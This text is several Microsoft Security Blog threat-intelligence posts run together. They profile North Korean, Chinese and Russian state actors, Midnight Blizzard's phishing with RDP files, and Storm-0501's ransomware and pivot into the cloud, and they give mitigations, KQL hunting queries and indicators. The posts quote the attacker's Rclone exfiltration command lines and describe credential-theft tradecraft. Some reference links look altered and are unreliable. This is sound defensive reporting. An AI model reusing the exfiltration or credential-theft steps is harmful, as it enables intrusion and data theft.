The talk DPRK – All grown up will cover how the Democratic People’s Republic of Korea (DPRK) has successfully built computer network exploitation capability over the past 10 years and how threat actors have enabled North Korea to steal billions of dollars in cryptocurrency as well as target organizations associated with satellites and weapons systems. Over this period, North Korean threat actors have developed and used multiple zero-day exploits and have become experts in cryptocurrency, blockchain, and AI technology.

This presentation will also include information on North Korea overcoming sanctions and other financial barriers by the United States and multiple other countries through the deployment of North Korean IT workers in Russia, China, and, other countries. These IT workers masquerade as individuals from countries other than North Korea to perform legitimate IT work and generate revenue for the regime. North Korean threat actors’ focus areas are:

• Stealing money or cryptocurrency to help fund the North Korea weapons programs
• Stealing information pertaining to weapons systems, sanctions information, and policy-related decisions before they occur
• Performing IT work to generate revenue to help fund the North Korea IT weapons program

Meanwhile, in the talk No targets left behind, Microsoft Threat Intelligence analysts will present research on Storm-2077, a Chinese threat actor that conducts intelligence collection targeting government agencies and non-governmental organizations. This presentation will trace how Microsoft assembled the pieces of threat activity now tracked as Storm-2077 to demonstrate how we overcome challenges in tracking overlapping activities and attributing cyber operations originating from China.

This blog summarizes intelligence on threat actors covered by the two Microsoft presentations at CYBERWARCON.

Sapphire Sleet: Social engineering leading to cryptocurrency theft

The North Korean threat actor that Microsoft tracks as Sapphire Sleet has been conducting cryptocurrency theft as well as computer network exploitation activities since at least 2020. Microsoft’s analysis of Sapphire Sleet activity indicates that over 10 million US dollars’ worth of cryptocurrency was stolen by the threat actor from multiple companies over a six-month period.

Masquerading as a venture capitalist

While their methods have changed throughout the years, the primary scheme used by Sapphire Sleet over the past year and a half is to masquerade as a venture capitalist, feigning interest in investing in the target user’s company. The threat actor sets up an online meeting with a target user. On the day of the meeting, when the target user attempts to connect to the meeting, the user receives either a frozen screen or an error message stating that the user should contact the room administrator or support team for assistance.

When the target contacts the threat actor, the threat actor sends a script – a .scpt file (Mac) or a Visual Basic Script (.vbs) file (Windows) – to “fix the connection issue”. This script leads to malware being downloaded onto the target user’s device. The threat actor then works towards obtaining cryptocurrency wallets and other credentials on the compromised device, enabling the threat actor to steal cryptocurrency.  

Posing as recruiters

As a secondary method, Sapphire Sleet masquerades as a recruiter on professional platforms like LinkedIn and reaches out to potential victims. The threat actor, posing as a recruiter, tells the target user that they have a job they are trying to fill and believe that the user would be a good candidate. To validate the skills listed on the target user’s profile, the threat actor asks the user to complete a skills assessment from a website under the threat actor’s control. The threat actor sends the target user a sign-in account and password. In signing in to the website and downloading the code associated with the skills assessment, the target user downloads malware onto their device, allowing the attackers to gain access to the system.

Ruby Sleet: Sophisticated phishing targeting satellite and weapons systems-related targets

Ruby Sleet, a threat actor that Microsoft has been tracking since 2020, has significantly increased the sophistication of their phishing operations over the past several years. The threat actor has been observed signing their malware with legitimate (but compromised) certificates obtained from victims they have compromised. The threat actor has also distributed backdoored virtual private network (VPN) clients, installers, and various other legitimate software.

Ruby Sleet has also been observed conducting research on targets to find what specific software they run in their environment. The threat actor has developed custom capabilities tailored to specific targets. For example, in December 2023, Microsoft Threat Intelligence observed Ruby Sleet carrying out a supply chain attack in which the threat actor successfully compromised a Korean construction company and replaced a legitimate version of VeraPort software with a version that communicates with known Ruby Sleet infrastructure.

Ruby Sleet has targeted and successfully compromised aerospace and defense-related organizations. Stealing aerospace and defense-related technology may be used by North Korea to increase its understanding of missiles, drones, and other related technologies.

North Korean IT workers: The triple threat

In addition to utilizing computer network exploitation through the years, North Korea has dispatched thousands of IT workers abroad to earn money for the regime. These IT workers have brought in hundreds of millions of dollars for North Korea. We consider these North Korean IT workers to be a triple threat, because they:

• Make money for the regime by performing “legitimate” IT work
• May use their access to obtain sensitive intellectual property, source code, or trade secrets at the company
• Steal sensitive data from the company and in some cases ransom the company into paying them in exchange for not publicly disclosing the company’s data

Microsoft Threat Intelligence has observed North Korean IT workers operating out of North Korea, Russia, and China.

Facilitators complicate tracking of IT worker ecosystem

Microsoft Threat Intelligence observed that the activities of North Korean IT workers involved many different parties, from creating accounts on various platforms to accepting payments and moving money to North Korean IT worker-controlled accounts. This makes tracking their activities more challenging than traditional nation-state threat actors.

Since it’s difficult for a person in North Korea to sign up for things such as a bank account or phone number, the IT workers must utilize facilitators to help them acquire access to platforms where they can apply for remote jobs. These facilitators are used by the IT workers for tasks such as creating an account on a freelance job website. As the relationship builds, the IT workers may ask the facilitator to perform other tasks such as:

• Creating or renting their bank account to the North Korean IT worker
• Creating LinkedIn accounts to be used for contacting recruiters to obtain work
• Purchasing mobile phone numbers or SIM cards
• Creating additional accounts on freelance job sites

Fake profiles and portfolios with the aid of AI

One of the first things a North Korean IT worker does is set up a portfolio to show supposed examples of their previous work. Microsoft Threat Intelligence has observed hundreds of fake profiles and portfolios for North Korean IT workers on developer platforms like GitHub.

Additionally, the North Korean IT workers have used fake profiles on LinkedIn to communicate with recruiters and apply for jobs. 

In October 2024, Microsoft found a public repository containing North Korean IT worker files. The repository contained the following information:

• Resumes and email accounts used by the North Korean IT workers
• Infrastructure used by these workers (VPS and VPN accounts along with specific VPS IP addresses)
• Playbooks on conducting identity theft and creating and bidding jobs on freelancer websites without getting flagged
• Actual images and AI-enhanced images of suspected North Korean IT workers
• Wallet information and suspected payments made to facilitators
• LinkedIn, GitHub, Upwork, TeamViewer, Telegram, and Skype accounts
• Tracking sheet of work performed and payments received by these IT workers

Review of the repository indicates that the North Korean IT workers are conducting identity theft and using AI tools such as Faceswap to move their picture over to documents that they have stolen from victims. The attackers are also using Faceswap to take pictures of the North Korean IT workers and move them to more professional looking settings. The pictures created by the North Korean IT workers using AI tools are then utilized on resumes or profiles, sometimes for multiple personas, that are submitted for job applications.

In the same repository, Microsoft Threat Intelligence found photos that appear to be of North Korean IT workers:

Microsoft has observed that, in addition to using AI to assist with creating images used with job applications, North Korean IT workers are experimenting with other AI technologies such as voice-changing software. This aligns with observations shared in earlier blogs showing threat actors using AI as a productivity tool to refine their attack techniques. While we do not see threat actors using combined AI voice and video products as a tactic, we do recognize that if actors were to combine these technologies, it’s possible that future campaigns may involve IT workers using these programs to attempt to trick interviewers into thinking they are not communicating with a North Korean IT worker. If successful, this could allow the North Korean IT workers to do interviews directly and not have to rely on facilitators obtaining work for them by standing in on interviews or selling account access to them.

Getting payment for remote work

The North Korean IT workers appear to be very organized when it comes to tracking payments received.  Overall, this group of North Korean IT workers appears to have made at least 370,000 US dollars through their efforts. 

Protecting organizations from North Korean IT workers

Unfortunately, computer network exploitation and use of IT workers is a low-risk, high-reward technique used by North Korean threat actors. Here are some steps that organizations can take to be better protected:

• Follow guidance from the US Department of State, US Department of the Treasury, and the Federal Bureau of Investigation on how to spot North Korean IT workers.
• Educate human resources managers, hiring managers, and program managers for signs to look for when dealing with suspected North Korean IT workers.
• Use simple non-technical techniques such as asking IT workers to turn on their camera periodically and comparing the person on camera with the one that picked up the laptop from your organization.
• Ask the person on camera to walk through or explain code that they purportedly wrote.

Storm-2077: No targets left behind

Over the past decade, following numerous government indictments and the public disclosure of threat actors’ activities, tracking and attributing cyber operations originating from China has become increasingly challenging as the attackers adjust their tactics. These threat actors continue to conduct operations while using tooling and techniques against targets that often overlap with another threat actor’s operation. While analyzing activity that was affecting a handful of customers, Microsoft Threat Intelligence assembled the pieces of what would be tracked as Storm-2077. Undoubtably, this actor had some victimology and operational techniques that overlapped with a couple of threat actors that Microsoft was already tracking.  

Microsoft assesses that Storm-2077 is a China state threat actor that has been active since at least January 2024. Storm-2077 has targeted a wide variety of sectors, including government agencies and non-governmental organizations in the United States. As we continued to track Storm-2077, we observed that they went after several other industries worldwide, including the Defense Industrial Base (DIB), aviation, telecommunications, and financial and legal services. Storm-2077 overlaps with activity tracked by other security vendors as TAG-100.

We assess that Storm-2077 likely operates with the objective of conducting intelligence collection. Storm-2077 has used phishing emails to gain credentials and, in certain cases, likely exploited edge-facing devices to gain initial access. We have observed techniques that focus on email data theft, which could allow them to analyze the data later without risking immediate loss of access. In some cases, Storm-2077 has used valid credentials harvested from the successful compromise of a system.

We’ve also observed Storm-2077 successfully exfiltrate emails by stealing credentials to access legitimate cloud applications such as eDiscovery applications. In other cases, Storm-2077 has been observed gaining access to cloud environments by harvesting credentials from compromised endpoints. Once administrative access was gained, Storm-2077 created their own application with mail read rights.

Access to email data is crucial for threat actors because it often contains sensitive information that could be utilized later for malicious purposes. Emails can include sign-in credentials, confidential communication, financial records, business secrets, intellectual property, and credentials for accessing critical systems, or employee information. Access to email accounts and the ability to steal email communication could enable an attacker to further their operations.

Microsoft’s talk on Storm-2077 at CYBERWARCON will highlight how vast their targeting interest covers. All sectors appear to be on the table, leaving no targets behind. Our analysts will talk about the challenges of tracking China-based threat actors and how they had to distinctly carve out Storm-2077.

CYBERWARCON Recap

At this year’s CYBERWARCON, Microsoft Security is sponsoring the post-event Fireside Recap. Hosted by Sherrod DeGrippo, this session will feature special guests who will dive into the highlights, key insights, and emerging themes that defined CYBERWARCON 2024. Interviews with speakers will offer exclusive insights and bring the conference’s biggest moments into sharp focus.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON appeared first on Microsoft Security Blog.

The spear-phishing emails in this campaign were sent to thousands of targets in over 100 organizations and contained a signed Remote Desktop Protocol (RDP) configuration file that connected to an actor-controlled server. In some of the lures, the actor attempted to add credibility to their malicious messages by impersonating Microsoft employees. The threat actor also referenced other cloud providers in the phishing lures.

While this campaign focuses on many of Midnight Blizzard’s usual targets, the use of a signed RDP configuration file to gain access to the targets’ devices represents a novel access vector for this actor. Overlapping activity has also been reported by the Government Computer Emergency Response Team of Ukraine (CERT-UA) under the designation UAC-0215 and also by Amazon.

Midnight Blizzard is a Russian threat actor attributed by the United States and United Kingdom governments to the Foreign Intelligence Service of the Russian Federation, also known as the SVR. This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs), and IT service providers, primarily in the United States and Europe. Its focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018. Its operations often involve compromise of valid accounts and, in some highly targeted cases, advanced techniques to compromise authentication mechanisms within an organization to expand access and evade detection.

Midnight Blizzard is consistent and persistent in its operational targeting, and its objectives rarely change. It uses diverse initial access methods, including spear phishing, stolen credentials, supply chain attacks, compromise of on-premises environments to laterally move to the cloud, and leveraging service providers’ trust chain to gain access to downstream customers. Midnight Blizzard is known to use the Active Directory Federation Service (AD FS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is identified by peer security vendors as APT29, UNC2452, and Cozy Bear.

As with any observed nation-state actor activity, Microsoft is in the process of directly notifying customers that have been targeted or compromised, providing them with the necessary information to secure their accounts. Strong anti-phishing measures will help to mitigate this threat. As part of our commitment to helping protect against cyber threats, we provide indicators of compromise (IOCs), hunting queries, detection details, and recommendations at the end of this post.

Spear-phishing campaign

On October 22, 2024, Microsoft identified a spear-phishing campaign in which Midnight Blizzard sent phishing emails to thousands of users in over 100 organizations. The emails were highly targeted, using social engineering lures relating to Microsoft, Amazon Web Services (AWS), and the concept of Zero Trust. The emails contained a Remote Desktop Protocol (RDP) configuration file signed with a LetsEncrypt certificate. RDP configuration (.RDP) files summarize automatic settings and resource mappings that are established when a successful connection to an RDP server occurs. These configurations extend features and resources of the local system to a remote server, controlled by the actor.

In this campaign, the malicious .RDP attachment contained several sensitive settings that would lead to significant information exposure. Once the target system was compromised, it connected to the actor-controlled server and bidirectionally mapped the targeted user’s local device’s resources to the server. Resources sent to the server may include, but are not limited to, all logical hard disks, clipboard contents, printers, connected peripheral devices, audio, and authentication features and facilities of the Windows operating system, including smart cards. This access could enable the threat actor to install malware on the target’s local drive(s) and mapped network share(s), particularly in AutoStart folders, or install additional tools such as remote access trojans (RATs) to maintain access when the RDP session is closed. The process of establishing an RDP connection to the actor-controlled system may also expose the credentials of the user signed in to the target system.

RDP connection

When the target user opened the .RDP attachment, an RDP connection was established to an actor-controlled system. The configuration of the RDP connection then allowed the actor-controlled system to discover and use information about the target system, including:

• Files and directories
• Connected network drives
• Connected peripherals, including smart cards, printers, and microphones
• Web authentication using Windows Hello, passkeys, or security keys
• Clipboard data
• Point of Service (also known as Point of Sale or POS) devices

Targets

Microsoft has observed this campaign targeting governmental agencies, higher education, defense, and non-governmental organizations in dozens of countries, but particularly in the United Kingdom, Europe, Australia, and Japan. This target set is consistent with other Midnight Blizzard phishing campaigns.

Email infrastructure

Midnight Blizzard sent the phishing emails in this campaign using email addresses belonging to legitimate organizations that were gathered during previous compromises. The domains used are listed in the IOC section below.

Mitigations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

• Utilize Windows Firewall or Windows Firewall with Advanced Security to help prevent or restrict outbound RDP connection attempts to external or public networks external or public networks
• Require multifactor authentication (MFA). Implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
• Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with number matching. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and help blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen endpoint security configuration

If you are using Microsoft Defender for Endpoint take the following steps:

• Ensure tamper protection is turned on in Microsoft Defender for Endpoint.
• Turn on network protection in Microsoft Defender for Endpoint.
• Turn on web protection.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume. 
• Microsoft Defender XDR customers can turn on the following attack surface reduction rules to help prevent common attack techniques used by threat actors.
  • Block executable content from email client and webmail
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Strengthen antivirus configuration

• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections help block a majority of new and unknown variants.
• Enable Microsoft Defender Antivirus scanning of downloaded files and attachments.
• Enable Microsoft Defender Antivirus real-time protection.

Strengthen Microsoft Office 365 configuration

• Turn on Safe Links and Safe Attachments for Office 365.
• Enable Zero-hour auto purge (ZAP) in Office 365 to help quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Strengthen email security configuration

• Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. For example, Microsoft Defender for Office 365 merges incident and alert management across email, devices, and identities, centralizing investigations for email-based threats. Organizations can also leverage web browsers that automatically identify and help block malicious websites, including those used in phishing activities.
• If you are using Microsoft Defender for Office 365, configure it to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect an organization from malicious links used in phishing and other attacks.
• If you are using Microsoft Defender for Office 365, use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing credentials.

Conduct user education

• Robust user education can help mitigate the threat of social engineering and phishing emails. Companies should have a user education program that highlights how to identify and report suspicious emails.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

• Midnight Blizzard Actor activity group
• Suspicious RDP session

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects at least some of the malicious .RDP files as the following signature:

• Backdoor:Script/HustleCon.A

Microsoft Defender for Cloud

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

• Communication with suspicious domain identified by threat intelligence
• Suspicious outgoing RDP network activity
• Traffic detected from IP addresses recommended for blocking

Microsoft Defender for Office 365

Microsoft Defender for Office 365 raises alerts on this campaign using email- and attachment-based detections. Additionally, hunting signatures and an RDP file parser have been incorporated into detections to block similar campaigns in the future. Defenders can identify such activity in alert titles referencing RDP, for example, Trojan_RDP*.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide threat intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Midnight Blizzard targets NGOs in new wave of initial access campaigns.
• Midnight Blizzard targets diplomatic, NGOs, and humanitarian organizations in global spear phishing activity.

Hunting queries

Microsoft Defender XDR

Identify potential Midnight Blizzard targeted recipients 

Surface possible targeted email accounts within the environment where the email sender originated from a Midnight Blizzard compromised domain related to the RDP activity.

EmailEvents 
| where SenderFromDomain in~ ("sellar.co.uk", "townoflakelure.com", "totalconstruction.com.au", "swpartners.com.au", "cewalton.com") 
| project SenderFromDomain, SenderFromAddress, RecipientEmailAddress, Subject, Timestamp 

Surface potential targets of an RDP attachment phishing attempt

Surface emails that contain a remote desktop protocol (RDP) file attached. This may indicate that the recipient of the email may have been targeted in an RDP attachment phishing attack attempt.

EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project SenderFromAddress, RecipientEmailAddress, Subject, Timestamp, FileName, FileType

Identify potential successfully targeted assets in an RDP attachment phishing attack

Surface devices that may have been targeted in an email with an RDP file attached, followed by an RDP connection attempt from the device to an external network. This combined activity may indicate that a device may have been successfully targeted in an RDP attachment phishing attack.

// Step 1: Identify emails with RDP attachments
let rdpEmails = EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project EmailTimestamp = Timestamp, RecipientEmailAddress, NetworkMessageId, SenderFromAddress;
// Step 2: Identify outbound RDP connections
let outboundRDPConnections = DeviceNetworkEvents
| where RemotePort == 3389
| where ActionType == "ConnectionAttempt"
| where RemoteIPType == "Public"
| project RDPConnectionTimestamp = Timestamp, DeviceId, InitiatingProcessAccountUpn, RemoteIP;
// Step 3: Correlate email and network events
rdpEmails
| join kind=inner (outboundRDPConnections) on $left.RecipientEmailAddress == $right.InitiatingProcessAccountUpn
| project EmailTimestamp, RecipientEmailAddress, SenderFromAddress, RDPConnectionTimestamp, DeviceId, RemoteIP

Threat actor RDP connection files attached to email

Surface users that may have received an RDP connection file attached in email that have been observed in this attack from Midnight Blizzard.

EmailAttachmentInfo
| where FileName in~ (
    "AWS IAM Compliance Check.rdp",
    "AWS IAM Configuration.rdp",
    "AWS IAM Quick Start.rdp",
    "AWS SDE Compliance Check.rdp",
    "AWS SDE Environment Check.rdp",
    "AWS Secure Data Exchange - Compliance Check.rdp",
    "AWS Secure Data Exchange Compliance.rdp",
    "Device Configuration Verification.rdp",
    "Device Security Requirements Check.rdp",
    "IAM Identity Center Access.rdp",
    "IAM Identity Center Application Access.rdp",
    "Zero Trust Architecture Configuration.rdp",
    "Zero Trust Security Environment Compliance Check.rdp",
    "ZTS Device Compatibility Test.rdp"
)
| project Timestamp, FileName, SHA256, RecipientEmailAddress, SenderDisplayName, SenderFromAddress

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Email sender domains

RDP file names

• AWS IAM Compliance Check.rdp
• AWS IAM Configuration.rdp
• AWS IAM Quick Start.rdp
• AWS SDE Compliance Check.rdp
• AWS SDE Environment Check.rdp
• AWS SDE Environment Check.rdp 
• AWS Secure Data Exchange – Compliance Check.rdp
• AWS Secure Data Exchange Compliance.rdp
• Device Configuration Verification.rdp
• Device Security Requirements Check.rdp
• IAM Identity Center Access.rdp
• IAM Identity Center Application Access.rdp
• Zero Trust Architecture Configuration.rdp
• Zero Trust Security Environment Compliance Check.rdp
• ZTS Device Compatibility Test.rdp

RDP remote computer domains

References

• https://cert.gov.ua/article/6281076
• https://aws.Alpha XR/blogs/security/amazon-identified-internet-domains-abused-by-apt29/
• https://media.defense.gov/2024/Oct/09/2003562611/-1/-1/0/CSA-UPDATE-ON-SVR-CYBER-OPS.PDF
• http://approjects.co.za/?big=security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/?msockid=392e4194f0f26165030055c3f1de6080
• http://approjects.co.za/?big=security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/?msockid=392e4194f0f26165030055c3f1de6080

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files appeared first on Microsoft Security Blog.

Storm-0501 has been active as early as 2021, initially observed deploying the Sabbath(54bb47h) ransomware in attacks targeting US school districts, publicly leaking data for extortion, and even directly messaging school staff and parents. Since then, most of the threat actor’s attacks have been opportunistic, as the group began operating as a ransomware-as-a-service (RaaS) affiliate deploying multiple ransomware payloads developed and maintained by other threat actors over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and most recently, Embargo ransomware. The threat actor was also recently observed targeting hospitals in the US.

Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments. They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises. Microsoft previously observed threat actors such as Octo Tempest and Manatee Tempest targeting both on-premises and cloud environments and exploiting the interfaces between the environments to achieve their goals.

As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations. Microsoft is committed to helping customers understand these attacks and build effective defenses against them.

In this blog post, we will go over Storm-0501’s tactics, techniques, and procedures (TTPs), typical attack methods, and expansion to the cloud. We will also provide information on how Microsoft detects activities related to this kind of attack, as well as provide mitigation guidance to help defenders protect their environment.

Analysis of the recent Storm-0501 campaign

On-premises compromise

Initial access and reconnaissance

Storm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging possibly stolen compromised credentials to sign in to the target system, or exploiting various known remote code execution vulnerabilities in unpatched public-facing servers. In a recent campaign, Storm-0501 exploited known vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion 2016 application (possibly CVE-2023-29300 or CVE-2023-38203). In cases observed by Microsoft, these initial access techniques, combined with insufficient operational security practices by the targets, provided the threat actor with administrative privileges on the target device.

After gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed extensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain Administrator users and domain forest trust. Common native Windows tools and commands, such as systeminfo.exe, net.exe, nltest.exe, tasklist.exe, were leveraged in this phase. The threat actor also utilized open-source tools like ossec-win32 and OSQuery to query additional endpoint information. Additionally, in some of the attacks, we observed the threat actor running an obfuscated version of ADRecon.ps1 called obfs.ps1 or recon.ps1 for Active Directory reconnaissance.

Following initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools (RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.

Credential access and lateral movement

The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods. The threat actor primarily utilized Impacket’s SecretsDump module, which extracts credentials over the network, and leveraged it across an extensive number of devices to obtain credentials. The threat actor used the compromised credentials to access more devices in the network and then leveraged Impacket again to collect additional credentials. The threat actor then repeated this process until they compromised a large set of credentials that potentially included multiple Domain Admin credentials.

In addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering KeePass secrets from the compromised devices. The threat actor used EncryptedStore’s Find-KeePassConfig.ps1 PowerShell script to output the database location and keyfile/user master key information and launch the KeePass executable to gather the credentials. We assess with medium confidence that the threat actor also performed extensive brute force activity on a few occasions to gain additional credentials for specific accounts.

The threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised credentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send further commands. The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that were launched by rundll32.exe and regsvr32.exe respectively. Moreover, the “license_id” associated with this Cobalt Strike Beacon is “666”.  The “license_id” definition is commonly referred to as Watermark and is a nine-digit value that is unique per legitimate license provided by Cobalt Strike. In this case, the “license_id” was modified with 3-digit unique value in all the beacon configurations.

In cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and access to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.

Data collection and exfiltration

The threat actor was observed exfiltrating sensitive data from compromised devices. To exfiltrate data, the threat actor used the open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or scvhost.exe as masquerading means. The threat actor employed the renamed Rclone binaries to transfer data to the cloud, using a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple threads. The following are command line examples used by the threat actor in demonstrating this behavior:

• Svhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11
• scvhost.exe –config C:\Windows\Debug\a.conf copy [REDACTED UNC PATH] [REDACTED]

Defense evasion

The threat actor attempted to evade detection by tampering with security products in some of the devices they got hands-on-keyboard access to. They employed an open-source tool, resorted to PowerShell cmdlets and existing binaries to evade detection, and in some cases, distributed Group Policy Object (GPO) policies to tamper with security products.

On-premises to cloud pivot

In their recent campaign, we noticed a shift in Storm-0501’s methods. The threat actor used the credentials, specifically Microsoft Entra ID (formerly Azure AD), that were stolen from earlier in the attack to move laterally from the on-premises to the cloud environment and establish persistent access to the target network through a backdoor.

Storm-0501 was observed using the following attack vectors and pivot points on the on-premises side to gain subsequent control in Microsoft Entra ID:

Microsoft Entra Connect Sync account compromise

Microsoft Entra Connect, previously known as Azure AD Connect, is an on-premises Microsoft application that plays a critical role in synchronizing passwords and sensitive data between Active Directory (AD) objects and Microsoft Entra ID objects. Microsoft Entra Connect synchronizes the on-premises identity and Microsoft Entra identity of a user account to allow the user to sign in to both realms with the same password. To deploy Microsoft Entra Connect, the application must be installed on an on-premises server or an Azure VM. To decrease the attack surface, Microsoft recommends that organizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain administrators or other tightly controlled security groups. Microsoft Incident Response also published recommendations on preventing cloud identity compromise.

Microsoft Entra Connect Sync is a component of Microsoft Entra Connect that synchronizes identity data between on-premises environments and Microsoft Entra ID. During the Microsoft Entra Connect installation process, at least two new accounts (more accounts are created if there are multiple forests) responsible for the synchronization are created, one in the on-premises AD realm and the other in the Microsoft Entra ID tenant. These service accounts are responsible for the synchronization process.

The on-premises account name is prefixed with “MSOL_” and has permissions to replicate directory changes, modify passwords, modify users, modify groups, and more (see full permissions here).

The cloud Microsoft Entra ID account is prefixed with “sync_<Entra Connect server name>_” and has the account display name set to “On-Premises Directory Synchronization Service Account”. This user account is assigned with the Directory Synchronization Accounts role (see detailed permissions of this role here). Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync and helps prevent abuse.

The on-premises and cloud service accounts conduct the syncing operation every few minutes, similar to Password Hash Synchronization (PHS), to uphold real time user experience. Both user accounts mentioned above are crucial for the Microsoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI (Data Protection API) on the server’s disk or a remote SQL server.

We can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts. We assess that the threat actor was able to achieve this because of the previous malicious activities described in this blog post, such as using Impacket to steal credentials and DPAPI encryption keys, and tampering with security products.

Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear text credentials and get an access token to Microsoft Graph. The compromise of the Microsoft Entra Connect Sync account presents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid account (on-premises account that is synced to Microsoft Entra ID).

Cloud session hijacking of on-premises user account

Another way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a respective user account in the cloud. In some of the Storm-0501 cases we investigated, at least one of the Domain Admin accounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA) disabled, and assigned with a Global Administrator role. It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case. However, if the passwords for both accounts are the same, or obtainable by on-premises credential theft techniques (i.e. web browsers passwords store), then the pivot is possible.

